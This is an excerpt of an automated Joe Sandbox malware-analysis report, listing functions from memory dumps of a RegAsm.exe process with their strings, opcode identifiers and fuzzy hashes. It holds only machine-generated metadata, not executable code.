                                                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                          • API String ID: 0-3051831665
                                                                                          • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                          • Instruction ID: 031999ec183740149f4de01a3c7c6b80cad0f2a7df6bcf1615799a6dd7ab9f70
                                                                                          • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                          • Instruction Fuzzy Hash: 4531B3B6A20618EFCB11EF95CD44EEEBBBDEF86710F104425E514AB160DB70EA858B50
                                                                                          Function 032720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 032720F3
                                                                                          • LdrpInitializationFailure, xrefs: 032720FA
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 03272104
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-2986994758
                                                                                          • Opcode ID: 02d94aa1dd92dc942be775645547c87f44bdded3829873a6c0650e7253302bcc
                                                                                          • Instruction ID: ff26d1ed9f003f3057d2f5b1447528168e54ac1792a192976e9790b6b0f8894b
                                                                                          • Opcode Fuzzy Hash: 02d94aa1dd92dc942be775645547c87f44bdded3829873a6c0650e7253302bcc
                                                                                          • Instruction Fuzzy Hash: EBF02874650308BFE724E608EC07F997768FB46F44F140458F6007B282D2F0E980CA41
                                                                                          Function 032003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: #%u
                                                                                          • API String ID: 48624451-232158463
                                                                                          • Opcode ID: ef406c061ec8b863e3898d7a3dccb8e33114107ff92639930fbe7bd127e1e6a3
                                                                                          • Instruction ID: f447665927e5c591f31924673ca5db4d66c418f10aae88969972a11849483c2e
                                                                                          • Opcode Fuzzy Hash: ef406c061ec8b863e3898d7a3dccb8e33114107ff92639930fbe7bd127e1e6a3
                                                                                          • Instruction Fuzzy Hash: 03717D75A1024A9FDB01DFA9C980BAEB7F8FF08304F144065E904EB291E774EE85CB60
                                                                                          Function 032052A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@
                                                                                          • API String ID: 0-149943524
                                                                                          • Opcode ID: 5927c4537bd7294c46bbd67e5299d5b4cb10190c25df4dfadd7489eb46f853ab
                                                                                          • Instruction ID: 1912b62b8437cc2f62a1e96b959de9cd87293e620293fd969db6916a0c58e6fe
                                                                                          • Opcode Fuzzy Hash: 5927c4537bd7294c46bbd67e5299d5b4cb10190c25df4dfadd7489eb46f853ab
                                                                                          • Instruction Fuzzy Hash: 89328C745283128BC724CF18C484B3EB7E5AF86744F68491EF9859B2A1E774D9C8CF92
                                                                                          Function 032BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `$`
                                                                                          • API String ID: 0-197956300
                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                          • Instruction ID: 0e9e0651bd459a827a7b91cdcd95314986083451e46727106b6f206ce47a219a
                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                          • Instruction Fuzzy Hash: 48C1E0712283429BDB24CF28C841BABFBF5BF84394F084A2DF595CA290D7B5D585CB91
                                                                                          Function 031F0CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • ResIdCount less than 2., xrefs: 0324EEC9
                                                                                          • Failed to retrieve service checksum., xrefs: 0324EE56
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                          • API String ID: 0-863616075
                                                                                          • Opcode ID: 33eca077069d7503ea607daef810270f6bc3e2c1e7e1df7049c0016dba426266
                                                                                          • Instruction ID: f08302249e52493907c599889d2d68845b69a34ac0f79d7a5d038a36c051118a
                                                                                          • Opcode Fuzzy Hash: 33eca077069d7503ea607daef810270f6bc3e2c1e7e1df7049c0016dba426266
                                                                                          • Instruction Fuzzy Hash: 0CE112B59187849FE324CF15C440BABFBE0FF88315F008A2EE6999B281D7719549CF86
                                                                                          Function 0326E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Legacy$UEFI
                                                                                          • API String ID: 2994545307-634100481
                                                                                          • Opcode ID: 4423a5c01a81601272742dfa799fbf7046035908089d615b2545cf872076e5da
                                                                                          • Instruction ID: 774cf9527a9c79adaa8f90632df5df8312c77933159061d07c1221ee5739330d
                                                                                          • Opcode Fuzzy Hash: 4423a5c01a81601272742dfa799fbf7046035908089d615b2545cf872076e5da
                                                                                          • Instruction Fuzzy Hash: 04619075E203099FDB15DFA8C940BADB7B9FF48700F25406DE549EB291D770A980CB50
                                                                                          Function 0320F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$$
                                                                                          • API String ID: 0-233714265
                                                                                          • Opcode ID: 4f37cbb080ef714ce7b4670ddedaab6554ad05eb086ed0549dbbe28e620632a0
                                                                                          • Instruction ID: d81a79d26bfaf137706ca405208c47e65482f4bfee4f7bc3cf4fe77b5f96bc31
                                                                                          • Opcode Fuzzy Hash: 4f37cbb080ef714ce7b4670ddedaab6554ad05eb086ed0549dbbe28e620632a0
                                                                                          • Instruction Fuzzy Hash: 6E61EC35A6074AEFDB30DFA4D680BADB7B1BF44704F184069D5156F682CBB4A9C9CB80
                                                                                          Function 031FA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 031FA2FB
                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 031FA309
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                          • API String ID: 0-2876891731
                                                                                          • Opcode ID: bb774da3d2dabf7a1a31986aeba44919efd894d89a75d12d232a43e6e50e6d42
                                                                                          • Instruction ID: 5d181b6c70a80adb9427ed051b479d98eadb838fc48531cb36ad934abfa8031b
                                                                                          • Opcode Fuzzy Hash: bb774da3d2dabf7a1a31986aeba44919efd894d89a75d12d232a43e6e50e6d42
                                                                                          • Instruction Fuzzy Hash: 8D41DE34A14745DFCB25DF59C840B6AB7B4FF88300F2844A9EE08DB291E779DA80CB40
                                                                                          Function 0322329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .Local\$@
                                                                                          • API String ID: 0-380025441
                                                                                          • Opcode ID: 4ce0e6ae7ccdc70411e6cd205b54d7c3ccfc0c72a6b5781d6362f3a2148c804a
                                                                                          • Instruction ID: 64fee9ade74363a30d507d8ff28f7bbeae975295527141bc14ddee94fa7b75fc
                                                                                          • Opcode Fuzzy Hash: 4ce0e6ae7ccdc70411e6cd205b54d7c3ccfc0c72a6b5781d6362f3a2148c804a
                                                                                          • Instruction Fuzzy Hash: F031947A528715AFC310DF28C880E5BBFE8FB85654F48092EF69587250D674DE848BD2
                                                                                          Function 031FC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MUI
                                                                                          • API String ID: 0-1339004836
                                                                                          • Opcode ID: 42e9b660ea13324da1cfd7bfe849369caa5a5899b56f008de08b78988eee14b8
                                                                                          • Instruction ID: 0ee136b4fb58d14ce31459d71374c31f822a34559b506a8070bce45232938cf6
                                                                                          • Opcode Fuzzy Hash: 42e9b660ea13324da1cfd7bfe849369caa5a5899b56f008de08b78988eee14b8
                                                                                          • Instruction Fuzzy Hash: 10825C75E002198FDB28CFA9D880BEDF7B5FF4C710F1881A9DA59AB254D7309981DB90
                                                                                          Function 03242F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: P`vRbv
                                                                                          • API String ID: 0-2392986850
                                                                                          • Opcode ID: 52e06879b990552b7fdc500e744e253beffa6da0ea906992b9c594f38bb29aa4
                                                                                          • Instruction ID: f0c88d78ede1afad8d94adbb4d307ba1734a8643b4c8661dae00e77aeac54c69
                                                                                          • Opcode Fuzzy Hash: 52e06879b990552b7fdc500e744e253beffa6da0ea906992b9c594f38bb29aa4
                                                                                          • Instruction Fuzzy Hash: 4A420679D2425BAADF2DDF68D8446FDFBB0AF04310F1C805AE645AB280D77489E1CB54
                                                                                          Function 031F7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e713760b92c5d66ee5748d95d40b8805ede63aad5d3cd27b0f696f9b01ee9fc
                                                                                          • Instruction ID: e42dc0e75c4e62852f9fbaf01ca5b4f3c46d914b985eff0dc67ad6ad9a7d1ec7
                                                                                          • Opcode Fuzzy Hash: 4e713760b92c5d66ee5748d95d40b8805ede63aad5d3cd27b0f696f9b01ee9fc
                                                                                          • Instruction Fuzzy Hash: 59A19E75608742CFD724DF28D480A2ABBF9BF88344F15496DF6858B390E770E985CB92
                                                                                          Function 03212E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: cb8954020dbd729dd54048745cf7be0a4577ffa67931c10d9dcb28e8783b3813
                                                                                          • Instruction ID: 8ee249e13f5996b3af8e0b1c1771049eafc1d3977f91ce97f2fb928182df8624
                                                                                          • Opcode Fuzzy Hash: cb8954020dbd729dd54048745cf7be0a4577ffa67931c10d9dcb28e8783b3813
                                                                                          • Instruction Fuzzy Hash: D7F1D579628346CFCB21CF24C680B6AB7E6BF98710F08486DF9899B340DB70D995CB51
                                                                                          Function 00416D73 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (
                                                                                          • API String ID: 0-3887548279
                                                                                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                          • Instruction ID: 2e83a0e9a62c4545cab2eb8bff0315c7039299d7cfc50ddaaacb5e3e432d7999
                                                                                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                          • Instruction Fuzzy Hash: 4C021EB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                          Function 031F2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PATH
                                                                                          • API String ID: 0-1036084923
                                                                                          • Opcode ID: b506b606eb1b20f274c7538189a76424133d1513c4566b251bb664707202b6c4
                                                                                          • Instruction ID: b96bfbfb3153e0c0c6f7b6ec058e87c14786c676922160d5d08a6fb858da7d8e
                                                                                          • Opcode Fuzzy Hash: b506b606eb1b20f274c7538189a76424133d1513c4566b251bb664707202b6c4
                                                                                          • Instruction Fuzzy Hash: F9F1C079D10218DFCB25DF99E881ABEB7B5FF4C700F498429EA51AB350D7749881CB60
                                                                                          Function 0322F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 70f7b9657a24ca033ae2f98dbbfab88557e0f763aa7d9039cf6e8ea3c2cc12c4
                                                                                          • Instruction ID: 677a387915865f8f1b1800dd66975ede86eb7f15999fdb305305822422f5a1ef
                                                                                          • Opcode Fuzzy Hash: 70f7b9657a24ca033ae2f98dbbfab88557e0f763aa7d9039cf6e8ea3c2cc12c4
                                                                                          • Instruction Fuzzy Hash: E6415CB5910299AFCB20DFA9D981AADFBF4FF49300F54812EE559A7211D7309984CF60
                                                                                          Function 031F0100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: 67bc7076e78e16c0092770362132235204587594eb82c68d47954631a5c2b7e9
                                                                                          • Instruction ID: ffca9dd7a65b608e15690e3cd29d14062decfe6a4c288e702e562e99206c4ceb
                                                                                          • Opcode Fuzzy Hash: 67bc7076e78e16c0092770362132235204587594eb82c68d47954631a5c2b7e9
                                                                                          • Instruction Fuzzy Hash: BEA10C75A143686FDF2CDA258841BFDA7A97F4D304F0A4099EE8A5B282C774CDC48B60
                                                                                          Function 0322A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: GlobalTags
                                                                                          • API String ID: 0-1106856819
                                                                                          • Opcode ID: b80954c7c3e8c0518964fb3f17ee6c017cc3fd01231c8c07758120a2740524b4
                                                                                          • Instruction ID: 612ca2cb2c369b837d7bd04bcb4430f0e6b9019f70523587bbeddfb61feaa97c
                                                                                          • Opcode Fuzzy Hash: b80954c7c3e8c0518964fb3f17ee6c017cc3fd01231c8c07758120a2740524b4
                                                                                          • Instruction Fuzzy Hash: A5717F75E2031ADFDF29CFA8D5906ADBBB1FF48700F28816AE405AB240D77199C5CB50
                                                                                          Function 031F973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                          • Instruction ID: 04b84a003be6120f65d24b1a4b77e9a8e30877019a728d6675a7deb6cfc0d2cc
                                                                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                          • Instruction Fuzzy Hash: C2617A75D1035DEFDB21EFA5C844BEEBBB4EF88710F184569E910A7290D7709A80CB60
                                                                                          Function 0327F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                          • Instruction ID: d6cff04c07227acd601a5ef7670143575be6e2e874ac507ceceba4cd66768ae9
                                                                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                          • Instruction Fuzzy Hash: F1518B72528746BFD721DF14C940F6BB7E8FB84754F040929B6809B290D7B4ED94CB92
                                                                                          Function 0320E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: EXT-
                                                                                          • API String ID: 0-1948896318
                                                                                          • Opcode ID: e728c46ad2aecff4b12aba9591b4a5c851ecc5604c21752f377c92727baccb24
                                                                                          • Instruction ID: b21509b88c8dd958ee1552260cf512fe98c20ec81d944ce659858b663aa08f50
                                                                                          • Opcode Fuzzy Hash: e728c46ad2aecff4b12aba9591b4a5c851ecc5604c21752f377c92727baccb24
                                                                                          • Instruction Fuzzy Hash: 5941B276528702ABD720DA75C940B6FB7E8AF88704F050D2DF984DB192E7B4D9C8C792
                                                                                          Function 032AB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PreferredUILanguages
                                                                                          • API String ID: 0-1884656846
                                                                                          • Opcode ID: 96f5332d05c49f7aefa1b58177ac38d982dde62dae678a48b33f2b674ea68b58
                                                                                          • Instruction ID: b3ee635531bbf01c814c6dafe59ee5af3959cd91a7e8789f8e2d7cc99241b216
                                                                                          • Opcode Fuzzy Hash: 96f5332d05c49f7aefa1b58177ac38d982dde62dae678a48b33f2b674ea68b58
                                                                                          • Instruction Fuzzy Hash: 2D41E676D20A1AABCF11DA99CC50BEEF7B9EF48710F150166E911EB250D7B0DE80C7A0
                                                                                          Function 0326C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryHash
                                                                                          • API String ID: 0-2202222882
                                                                                          • Opcode ID: d827a101359d2aabb09f2651100220faca4ab8ead7c046908f170d9184f72d50
                                                                                          • Instruction ID: 86256432bb76c490422ae47fcd61dfa77a7ab6852357ea120be3e09346b102df
                                                                                          • Opcode Fuzzy Hash: d827a101359d2aabb09f2651100220faca4ab8ead7c046908f170d9184f72d50
                                                                                          • Instruction Fuzzy Hash: 434152F5D1022DAADB21EA50DC84FDEB77CAF45714F0045E5A648AB140DB709EC88FA4
                                                                                          Function 032797A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: verifier.dll
                                                                                          • API String ID: 0-3265496382
                                                                                          • Opcode ID: 6c0c25cda32538bdb1a7714c000b28d4445949dfaace25af802215fffdaf026f
                                                                                          • Instruction ID: b86be5effb3e19a609e5628035c6b1bade3556dd0e314cad387a798bbb563f2a
                                                                                          • Opcode Fuzzy Hash: 6c0c25cda32538bdb1a7714c000b28d4445949dfaace25af802215fffdaf026f
                                                                                          • Instruction Fuzzy Hash: 6A318075A20302AFDB24DF29A851B26B6E5FB49714F68847AE544DF281E771CCC08790
                                                                                          Function 0329705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kLsE
                                                                                          • API String ID: 0-3058123920
                                                                                          • Opcode ID: da217f72022ebc7124993e9f0909d18c41f974a8dc41a358ba2dc09d9ed26232
                                                                                          • Instruction ID: 38e3733527b7104442f43481e9a8bfa213610c7d3106f87b282d2f7f58ab3be9
                                                                                          • Opcode Fuzzy Hash: da217f72022ebc7124993e9f0909d18c41f974a8dc41a358ba2dc09d9ed26232
                                                                                          • Instruction Fuzzy Hash: 4E4149725313414BFB21FB68F88EB697BA4AB50B64F1C821AED509E0C9C7B454C5C7A1
                                                                                          Function 032236EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Flst
                                                                                          • API String ID: 0-2374792617
                                                                                          • Opcode ID: 82ddfaf4b7dbe3d742be88d3f88b11a46c7825869ae96d6da0987dfe09af595d
                                                                                          • Instruction ID: 8c521b89fa55c4f3c20a1c16536366a256fb6164ccdf6e8bef4e65be32ade9c4
                                                                                          • Opcode Fuzzy Hash: 82ddfaf4b7dbe3d742be88d3f88b11a46c7825869ae96d6da0987dfe09af595d
                                                                                          • Instruction Fuzzy Hash: 2441ABB5625712EFC714CF18C880A16FBE4EF49710F18856EE5498F241D7B5D982CF91
                                                                                          Function 031F5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Actx
                                                                                          • API String ID: 0-89312691
                                                                                          • Opcode ID: a9e348862532767f0413e8f20f30b67474c446048957b99b2a14c04a166a2c3d
                                                                                          • Instruction ID: 98a3ec330ddc1f76b7cb79b1ca30a9579b0226a5de4a74c0a9f6bfd67259becc
                                                                                          • Opcode Fuzzy Hash: a9e348862532767f0413e8f20f30b67474c446048957b99b2a14c04a166a2c3d
                                                                                          • Instruction Fuzzy Hash: 501189317495038FD728D91D885067AB2D7EB9F354F3D852AE652CB351DB71EC818780
                                                                                          Function 0322E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
